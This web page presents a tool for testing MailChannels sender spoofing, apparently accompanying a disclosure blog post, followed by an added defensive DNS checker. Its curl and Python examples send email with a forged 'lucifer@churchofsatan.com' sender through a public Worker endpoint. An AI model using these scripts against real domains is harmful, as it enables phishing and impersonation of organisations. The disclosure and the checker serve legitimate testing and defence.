For more info see this blog post. The code for this Cloudflare Worker is here.
Use the form below to send an email and test whether a domain using MailChannels is misconfigured and can be impersonated.
For a complete list of options, see the MailChannels Transactional API docs.
The examples below send a spoofed email from churchofsatan.com.
Curl:
curl -X POST \
  -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  "https://spamchannel.haxxx.workers.dev/" \
  -d '{
    "personalizations": [{
      "to": [{
        "name": "",
        "email": "my@email.com"
      }]
    }],
    "from": {"email": "lucifer@churchofsatan.com", "name": "Lucifer"},
    "subject": "Hell is hot",
    "content": [{
      "type": "text/plain",
      "value": "Send aircon hot af down here"
    }]
  }'
Python:
#!/usr/bin/env python3
# This sends an HTML email
# Example: python spam.py myemail.html
import sys

import requests

sender_email = 'satan@churchofsatan.com'
receiver_email = 'me@email.com'

# Read the HTML body from the file given as the first argument
with open(sys.argv[1], 'r') as email_html_file:
    email_html = email_html_file.read()

# Request body in the MailChannels Transactional API format
email_json = {
    "personalizations": [
        {
            "to": [
                {
                    "email": receiver_email,
                }
            ]
        }
    ],
    "from": {
        "email": sender_email,
        "name": "Lucifer"
    },
    "subject": "Hell is hot",
    "content": [
        {
            "type": "text/html",
            "value": email_html
        }
    ]
}

print(f"Sending to {receiver_email} from {sender_email}")
r = requests.post(
    'https://spamchannel.haxxx.workers.dev/',
    json=email_json
)
print(r.text, r.status_code)
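
A defender-side check for the condition this page tests, as an added example that is not part of the original page or the Worker's code. It assumes, from MailChannels' Domain Lockdown documentation rather than from this page, that a domain can be impersonated when its SPF record includes `relay.mailchannels.net` and no `v=mc1` TXT record exists at `_mailchannels.<domain>`; the function names and sample records are constructed for illustration.

```python
# Added example: classify MailChannels spoofing exposure from DNS TXT records.
# Only direct SPF includes are checked; nested includes need recursive lookups.
MC_SPF_INCLUDE = "include:relay.mailchannels.net"


def _terms(record):
    """Split one TXT record into terms, dropping the quotes that dig prints."""
    return record.strip().strip('"').split()


def spf_authorises_mailchannels(apex_txt):
    """True if an SPF record at the domain apex includes the MailChannels relay."""
    for record in apex_txt:
        terms = [t.lower().lstrip("+") for t in _terms(record)]
        if terms and terms[0] == "v=spf1" and MC_SPF_INCLUDE in terms:
            return True
    return False


def lockdown_ids(lockdown_txt):
    """Sender ids permitted by a `v=mc1` record, or None when no such record exists."""
    for record in lockdown_txt:
        terms = _terms(record)
        if terms and terms[0].lower() == "v=mc1":
            return [t for t in terms[1:] if "=" in t]
    return None


def classify(apex_txt, lockdown_txt):
    """Return 'not-authorised', 'exposed', 'locked-no-senders' or 'locked-to:<ids>'."""
    if not spf_authorises_mailchannels(apex_txt):
        return "not-authorised"  # SPF does not vouch for MailChannels at all
    ids = lockdown_ids(lockdown_txt)
    if ids is None:
        return "exposed"  # SPF passes for every MailChannels sender
    return "locked-to:" + ",".join(ids) if ids else "locked-no-senders"


# Constructed records for placeholder domains: (apex TXT, _mailchannels TXT)
SAMPLES = {
    "exposed.example": (['"v=spf1 include:relay.mailchannels.net ~all"'], []),
    "locked.example": (["v=spf1 include:relay.mailchannels.net -all"],
                       ['"v=mc1 cfid=app.example.workers.dev"']),
    "other.example": (["v=spf1 mx -all"], []),
}

if __name__ == "__main__":
    for domain, (apex, lockdown) in SAMPLES.items():
        print(domain, classify(apex, lockdown))
```

Feed it the TXT records returned for the domain itself and for `_mailchannels.<domain>`, for example from `dig +short TXT`.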